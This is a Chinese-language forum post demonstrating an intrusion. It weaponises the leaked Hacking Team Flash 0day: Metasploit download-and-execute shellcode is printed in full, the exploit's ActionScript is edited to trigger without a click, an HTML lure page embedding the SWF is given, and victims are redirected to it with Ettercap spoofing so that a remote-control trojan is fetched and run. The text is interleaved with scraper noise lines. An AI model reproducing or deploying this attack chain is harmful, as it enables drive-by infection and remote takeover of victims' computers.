|
4 N4 Y! F$ x9 { 三、flash 0day之手工代码修改制作下载者实例入侵演示
, I/ D, S4 G2 x4 [
# i) Z# x' c) F. s" Q9 E" j5 D t. X3 [5 R; Q7 Q
利用到的工具: $ H5 g0 c: B/ r+ h
$ ?$ ?8 r! U3 Y% u: C u; K) a0 M, k9 F6 U
Msf 2 i$ v. ]6 g& ?- g
* a v _9 `" h5 ]" |; }1 L% H0 C8 ?; Z9 t8 P
Ettercap
8 p$ ~0 u3 K% k% M& N* x, w 9 E: |# M" J# n0 `! L' |! j
2 t- A6 l' g: X Adobe Flash CS6
( ^9 l1 W1 b8 k4 u
% j3 v }# Y( M: X+ G* k# P5 Y; S T) @( J* R0 J( i& A: n
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
$ x8 W5 {1 u: E2 I, \* b
& ]# h" A- n$ h+ h& H$ W/ _6 Y4 f4 S% i2 j$ g# d; j% R
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options - h( J& A! z# A7 U! r
6 V& J( e8 X6 y( ^8 B! X4 e
9 i. _) {( |) ]( S1 R0 { 如图:
! d# s$ c8 Q6 s3 L3 f % h; K( l0 C8 C
7 n6 {5 d+ P- C: v q6 e( Y0 c3 w - ]6 K2 |/ G8 G2 Z! f9 D- @
* F( b# ?. g1 p6 E) ^5 V
4 C" G% M: P! z) ]# A 
" ^. O4 f0 R9 E, W/ w( s$ d % n8 z) |8 I" d7 j8 M
* x; C" ~* ~+ s( O' R 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 5 i; d1 P# x. b) A& M! M) o
) d( L- N3 J5 k
* T7 @+ L1 e; N g" S! q: g- }
, X) m% ?4 N% h " \) w& [, _/ b% H" g% M
4 ^9 O, a2 X9 C S3 p# v @
. l5 @' `' j# x4 \# T% S % o/ i. n+ j1 t) B" K
+ F- z0 |$ y# @
然后执行generate -t dword生成shellcode,如下: 8 f6 j3 w: \! ]+ [
+ R' e& Y) G# M! x$ P: K0 t# k N
) h- {& k9 v1 v; t* J  ! J( e( j" `3 s+ ~# K7 W" e
4 Z2 s; O2 @5 J; I' g) q# o% Z3 L" i% m! W3 j" B2 }! D
复制代码到文本下便于我们一会编辑flash exp,如下: 1 i6 S) y; k; d% r" s# b N' J2 b% a
. z3 T; {& I$ c1 \/ h' O1 s
5 R* M/ S8 }( F+ D 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
7 k& ?$ B5 y" Q- ^ 2 Y9 q/ Y* c% Z" s; L: F# T! z
8 |0 i0 x6 G1 G8 u
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 2 [) H- [8 C7 j8 V; F/ X) {
^ M* V" I) J" I% i9 Q
, r. O& R0 b; @% g+ I2 z, T
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, , U# `' }6 X. s8 C( a% G' I+ I
3 ^& y* Y3 j% L& ~9 q" L" l( G7 P! g2 ?' w$ x! |. W, w$ S( \8 V
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, & {2 m, {7 x U# U
6 r/ U# m- V6 E9 I+ K' D# j2 X% j" m& _. V, t- D: q1 A% H
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
4 m: q, M( u' }6 u3 Y ; K' { \2 g# t8 v( x+ R2 M9 g
3 p1 r5 A9 @4 C& b Q* n 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, $ D' h! l1 W/ [5 |1 J- R
: s2 {) ~$ [* K" C2 B M- C4 V' i. ~' ?* q" o
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, " V; h. S" ~3 I5 g5 ~
6 b# B, O* @9 ~% P1 H, C8 \6 S# D$ V2 U2 J! }
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
3 L/ n4 e1 i2 A5 v, b& @$ B& C3 c N; z, z3 I( ?. c \; i- c- M x
5 \7 G" J$ B0 K$ R2 m 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ! Q" a& X8 J' n l4 |" G4 u- [$ e
' y% l; m ^) B* l% l& L" g3 v3 L7 z, p4 ?8 x* T
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
) N- {, \. R( C& I2 g0 t 2 O! P7 V: t) q% i5 l
5 r H/ [$ [: r5 g+ Y9 n# G- \ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 4 J5 S4 y& Z7 o- a# C. C1 Z
+ A- N4 j! d' v6 S2 p) ?
- x2 q. |5 B: e4 x8 p! @4 ] 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
: {* ^# N" o: ]4 c. i: f3 a+ A
( x: ^1 u W4 x: M5 F& g4 V6 U3 w5 _. `) }
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 3 d9 b' w- L, K! b% T! |1 c8 E
* x% @- e+ z" B- j4 v3 z# i* S2 H; ]1 |7 U
: F4 `8 F m1 a, G9 j 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ' A4 F* N- C0 `- f; A
7 K! h5 o/ D/ U. m$ V
- z" G& q/ i- `1 F4 c% g) [ $ K' I9 X! `1 U% Y! S- ]; l
+ ~' \/ P6 ~# w: }% n. a
/ f% ?! |" O: n: J, Z ~- ?9 D
+ r8 `8 T( R9 F: @. U% X- z 8 [- N, W. J2 R* S; i% V, a
* ?3 Z" l3 ]: ^4 ]8 Z 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 5 r8 ~# T6 K. C' Z0 ~* C- Q
% I( m& D6 r$ a8 X
3 _$ v1 h v+ A7 _6 y/ ]3 v
! h9 q$ U0 } J. b2 ~) K 7 X0 l& \- |* c' N2 A
9 z, Q# R7 I1 |2 C- o& ?2 l9 ^" x
先修改ShellWin32.as,部分源代码如图:
: O6 C) j$ o1 s# M; H( ` & @) y; U- {4 X
- n0 l! J% N I 
& Z0 A1 @3 ]' z7 S0 \1 L 1 \! {0 e% @: J) G% |: }; \
' h7 I8 N" z; e* K 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 6 c9 D( V) N2 ^- z8 c5 s
2 A$ m$ w: p/ s: d1 Z
# M0 D% N- x) o& h3 v0 g0 w8 q7 V. U 
; a; V1 F; d. [+ t$ C6 E& a ^' E
- x* ~0 O R; Y1 w+ T& ?2 h
2 G: l, [" n9 {2 M- T 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: : l' i0 b0 h; t1 o& \' `
) z+ Q- k' [# h# b D
8 \$ z2 O! _% F; y 
^3 W! K0 U) } 8 s3 W6 [9 f0 j5 l) g( s' L
" h5 g( O: Z0 O9 f! k
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
& _& T: [7 W' s& v* k/ p! r , t- J }* {% e( S& M$ c
: `9 [5 b- h2 k. Z; P; }# w9 g
/ q' L8 {5 r: }' c) V1 p) [$ q) v, f 9 m- B! z8 G; |9 E
U2 ?6 o# q; D+ \. F. I" _8 D
$ J+ H+ s3 P9 f# {! q ( }7 p c; D4 A I6 _- N+ J
* n/ v0 \3 L6 Q4 W& [ 
% H" G8 S+ G, _* ^2 F
" E# _4 u" k2 b0 T' L/ C! L c6 C( [7 c) p4 y$ J$ g
然后点保存,下面我们来编译一下,打开
' @2 C3 q6 K/ O5 t( s ( `/ q2 c. P) K( x7 I
* e+ C) z8 ^) N
exp1.fla然后点文件-发布,看看编译没错误
$ y! C6 o2 G+ T7 k5 H
% s+ o" i5 H4 k. [. l& F. h: U
2 F1 U- z$ v' b
6 [$ e+ Q; g3 n 7 N5 a; `& _ n @; x+ j( l" f
& w$ f0 `& }, [) |0 {5 c. D- f 4 @. N6 C2 H' p" Z3 F: c& M
+ D" Q4 w1 Y+ n% H- c
3 N9 C5 w# i( \% C+ [, b: O
9 N3 s! K8 {8 Q y" T) u7 R* n ) y! a* g1 |1 N1 n' V1 K
, @8 d( q% q) {; c {; e& z
" b/ V. e0 l* Y9 P+ ]1 c( T
; u+ p* B# Q1 g* a& u- ^- Y' m* D& }: T7 A5 ^
然后我们把生成的 3 ?5 d X, Z7 W. e; \: n
$ ]8 ?. M9 n) Q1 R" j/ @. n$ w9 K: \3 c5 O2 q T
exp1.swf丢到kailinux 的/var/www/html下:
3 e9 V6 L. X7 J {( L ) k o9 Q7 v' j% i0 G
! t6 a/ }, ]& E; W/ |
然后把这段代码好好编辑一下 ; K# W/ l1 t i2 k+ j! x9 C) C: h
9 W" n6 d% f4 X& l7 C, M
9 O- e% E5 }+ b4 c( K1 J/ G# r
* v" o8 q3 ^8 `/ p G; F( w * D$ [4 W4 U8 n' a* y) F% _! ~/ @
: p9 I. n; c1 d) P
9 O! E# |; ?. L( I+ C; W6 j
6 Z+ m+ z/ i) a0 V. y4 S
* ^2 a4 }3 a2 q: P2 V d* r0 V8 e. E9 B
; z! ~ |# _" B h1 E3 d( n# _3 d5 v/ ~. A4 o& W% _0 D/ D9 a" H' i
6 S) U+ T8 _$ `5 V; |5 o
0 f8 h: ]- w8 b, M) a0 Z
$ X0 y; C f$ }5 R
" ?% p- J" |9 x9 M4 u8 r% D
- H! d3 Y+ c" Z/ v. W+ w
- d. s) D/ H+ K2 p- | A$ k- h6 o
' T3 B. d& d. e# c. M
+ o% _7 L3 }. ?" G2 I9 g$ R) @; w7 O
<!DOCTYPE html>
& B: b8 Y5 k/ Q) ^0 E K, \6 u% e: y* v
+ D1 Z( b# [( S3 s <html> 6 D8 r P: ] Z4 k
1 |# o2 G& ?8 `9 }! n/ E- a( o+ t7 O8 ~" }5 G
<head> 3 ]6 b* i; i* _0 S+ _
2 w( x7 b, ^, y4 L2 o7 ]6 f* g
K5 E0 i! l. K1 E <meta http-equiv="Content-Type" content="text/html;
7 ^1 N5 F2 f: k, Z) F % x+ P7 U, T. a- t
8 u9 Z( g: F+ ]- ]- D: k charset=utf-8"/> 5 O2 U! H6 y7 U9 P& U
9 C0 j5 h4 w9 |) U
6 @" `% T. k! n9 n4 ^
</head> # I0 c) K* V) D/ l' H# C! ]1 {
( [, p6 `# B) n! n# R% O! Q
+ F% }+ i: Y. Q. L4 d( Y <body> $ h- {! l. F" l8 l' a% r' C" I
( Z$ P1 O; P" U6 O z
7 d% X( e7 C* V5 U$ T& P
<h2> Please wait, the requested page is loading...</h2>
4 y' T9 Q; c9 j7 w
. C3 ]3 [! o( J3 y: j8 A/ x/ @* M1 o8 S+ @9 w
<br> 7 j( \+ S1 f9 `/ W' H
' B: J0 S' ^0 S% m$ q3 J' J
l- X6 d3 }/ i0 k9 J: c# f% { <OBJECT , |3 L0 Z N' l8 C
+ P4 A* \* K0 c! j e1 R; c; k V
& A% L) f _) T- ^7 o# o0 b$ ` classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
j4 j$ Y: E' ~( y 5 `0 g( {; B1 q, W7 U
' c# Q& T8 i* I% r4 Z
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 5 z: ]+ q. ?4 O, j
( @$ j; [: {5 D y) G8 o
6 p" Y$ s8 B+ E </body>
# P* r' u- L& F$ s& F & L5 ]& k! q& E& Y% y" G+ z' D8 ]
+ b( v, y6 e7 M2 _6 z5 y <script> ( H+ v+ |4 m9 D/ e
2 i. x# ^: T" P" x( C0 H; ?0 t/ \
# z6 O! \0 u+ g( Y( E/ O6 y setTimeout(function () {
! s7 o3 K5 L$ T8 b" D; X
" U. O) f9 e N5 t3 I/ F% [4 i. ]2 y
7 Q. L$ B- Z* I9 F6 F - `2 F% x! q5 u$ o4 J) U
9 g9 J) C6 J! d, ^0 X/ Y' D
, f* A/ }0 x" i0 Q
window.location.reload(); 9 ~5 C( f! e) }' M3 T& U/ s9 k4 e( m. ?
( x6 \$ |9 ~( s
/ P* Y: F5 E8 K5 q$ R }, 10000);
% w, Y9 l/ f, Z) E& Y% ?/ } ' i& p1 k7 {! V/ k; i% ^
/ [. i5 \+ r9 A ^4 l Y7 W+ j
, S) d. t4 ]$ C* |" K
1 D) N) z& t: \# r7 F0 A: f! o9 w
</script> + l2 A" i( N0 H$ F% \
% ~( E2 y. W! L% ?0 ?/ U c I' ?9 I* O* i
</html> ( m7 O" Y" l# G, b
* s- b* s: R( C. [
& s& }% O9 u5 C$ \- [% k 1 T7 f2 F0 z" r
% s& `1 f( w# ?% V- g
5 f9 o: H2 J4 \- K+ P/ a 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 5 g$ c, _+ L( M/ O& b$ K' |
. r2 x* ]' F+ {7 K7 F; G1 y+ d& c
5 e" @/ l$ s+ H R! ]3 Q  & Z) L# O) }$ \9 ^7 |0 T
) T N3 T" H7 ~
2 a5 u! V3 |' J" l/ Y1 t
g8 m4 d5 }0 c3 K9 u 4 X/ Q2 Q1 P/ a, l: W8 B, M1 E
3 \) Y9 I7 w* k/ l6 x0 l& m
0 Y" }) F* h! G% T1 A
! o2 J+ ~) a4 w8 _3 c) Y
: P" o. x( d7 D
1 C+ M1 y0 S9 ]
& ?9 D% k, ^$ j3 x: }4 W6 X
6 ~: Z4 _6 G3 F+ M* b" G ) w8 }! U- B8 P9 p9 I; _7 C
; l0 m* P& d6 ` \; l
; E9 y8 k' Q. m5 {3 k 下面我们用ettercap欺骗如图:
$ |. |7 p& |4 A! L$ F' N
! H2 [1 C0 k( ^3 {& h# j
( K4 u! c7 f% d+ R2 s' |7 s 
7 A# y' M4 `" F9 l & x( V0 D9 w+ i' D% t p, V. J8 Z; v' _
' K& z! W' W, U% _, w
" r3 v3 B9 G/ A! H5 a % E$ Y5 ^( r2 n, _3 ~. j
5 T8 V2 Y& g4 k2 x* Y# h F/ r3 g$ T
下面我们随便访问个网站看看:
% S3 e8 M; i+ O. @' t5 U
$ d; R# P, v5 f# n5 q1 b
, v) u9 a& M. u4 a! N: f 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
& p2 Q# @5 \7 @# o, q
8 i' E6 P" Z- ?) _; J1 k* s( T& m1 t% `' K- v" n0 U
$ M9 T n$ |5 N6 e/ ]+ m
4 k% h8 b2 f& t1 y7 ^8 G( \2 B/ [, J8 c
我们看另一台, # |) w9 ]: y9 k- @( u
+ X. ]6 z, N; G2 ?% O; C
3 E- i& L2 N# c* [
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 7 o/ B: q7 ]9 N6 I1 p) N
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对